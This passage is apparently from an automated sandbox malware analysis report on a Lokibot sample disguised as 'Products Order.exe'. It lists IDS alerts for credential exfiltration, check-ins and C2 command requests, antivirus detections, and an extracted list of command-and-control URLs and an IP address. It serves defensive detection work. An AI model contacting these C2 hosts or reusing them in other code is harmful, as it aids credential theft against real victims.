                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.000180
                  SID:2021641
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:02.627302
                  SID:2024313
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:10.859696
                  SID:2825766
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:16.803035
                  SID:2025381
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.430034
                  SID:2825766
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:02.627302
                  SID:2024318
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.485062
                  SID:2024318
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:27.656502
                  SID:2825766
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.254938
                  SID:2825766
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:23.884685
                  SID:2021641
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.045718
                  SID:2025381
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.315004
                  SID:2024318
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:15.699411
                  SID:2021641
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.071740
                  SID:2024318
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.315004
                  SID:2024313
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.485062
                  SID:2024313
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.076784
                  SID:2025381
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:45.530428
                  SID:2024313
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:20.628600
                  SID:2021641
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.071740
                  SID:2024313
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:45.530428
                  SID:2024318
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:12.990169
                  SID:2024318
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:41.744488
                  SID:2825766
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:42.248026
                  SID:2025483
                  Source Port:80
                  Destination Port:49737
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.563893
                  SID:2025483
                  Source Port:80
                  Destination Port:49751
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.619828
                  SID:2025483
                  Source Port:80
                  Destination Port:49773
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:04.537805
                  SID:2021641
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:23.884685
                  SID:2825766
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.452852
                  SID:2825766
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.232610
                  SID:2825766
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.199755
                  SID:2825766
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:54.264582
                  SID:2021641
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.151548
                  SID:2825766
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:58.862053
                  SID:2024318
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:00.746100
                  SID:2825766
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.924787
                  SID:2025483
                  Source Port:80
                  Destination Port:49759
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.926842
                  SID:2025483
                  Source Port:80
                  Destination Port:49732
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:12.990169
                  SID:2024313
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:58.862053
                  SID:2024313
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.151548
                  SID:2021641
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.343817
                  SID:2024313
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:15.699411
                  SID:2825766
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:17.603710
                  SID:2025381
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.020338
                  SID:2024318
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.343817
                  SID:2024318
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:33.811515
                  SID:2021641
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.085627
                  SID:2825766
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:27.656502
                  SID:2021641
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:28.951650
                  SID:2025381
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:03.138281
                  SID:2025483
                  Source Port:80
                  Destination Port:49710
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.067189
                  SID:2025381
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.430034
                  SID:2021641
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:14.907253
                  SID:2021641
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.020338
                  SID:2024313
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Products Order.exeAvira: detected
                  Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                  Source: http://kbfvzoboss.bid/alien/fre.phpSophos S4: Label: malware callhome uri
                  Source: 45.90.57.51/big/five/fre.phpSophos S4: Label: malware callhome uri
                  Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.win/alien/fre.phpSophos S4: Label: malware callhome uri
                  Source: http://45.90.57.51/big/five/fre.phpSophos S4: Label: malware callhome uri
                  Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.trade/alien/fre.phpSophos S4: Label: malware callhome uri
                  Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.top/alien/fre.phpSophos S4: Label: malware callhome uri
                  Source: 45.90.57.51/big/five/fre.phpAvira URL Cloud: Label: malware
                  Source: http://45.90.57.51/big/five/fre.phpAvira URL Cloud: Label: malware
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.90.57.51/big/five/fre.php"]}
                  Source: Products Order.exeJoe Sandbox ML: detected
                  Source: Products Order.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: Products Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Skidomoney.pdb source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204619498.0000000000012000.00000002.00000001.01000000.00000007.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49704 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49704 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49704 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49704 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49704 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49705 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49705 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49705 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49705 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49705 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49706 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49706 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49706 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49706
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49707 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49707
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49708 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49708
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49709 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49709
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49710 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49710
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49711 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49711
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49712 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49712
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49713 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49713
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49722 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49722
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49723 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49723
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49724 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49724
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49725 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49725
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49726 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49726
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49727 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49727
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49728 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49728
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49729 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49729
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49730 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49730
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49731 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49731
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49732 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49732
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49733 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49733
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49734 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49734
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 45.90.57.51:80
